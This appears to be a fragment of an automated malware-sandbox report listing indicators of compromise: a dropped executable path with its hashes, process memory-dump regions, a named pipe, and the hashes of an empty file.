C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/4004-294-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/4004-295-0x0000000000BD0000-0x0000000000D1A000-memory.dmp

memory/3848-298-0x00000000771B2000-0x00000000771B3000-memory.dmp

memory/1464-301-0x00000000771B2000-0x00000000771B3000-memory.dmp

memory/3200-306-0x00000000771B2000-0x00000000771B3000-memory.dmp

memory/3028-311-0x00000000771B2000-0x00000000771B3000-memory.dmp

memory/1448-314-0x00000000771B2000-0x00000000771B3000-memory.dmp

memory/2308-317-0x00000000771B2000-0x00000000771B3000-memory.dmp

\??\PIPE\RManFUSCallbackNotify32

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e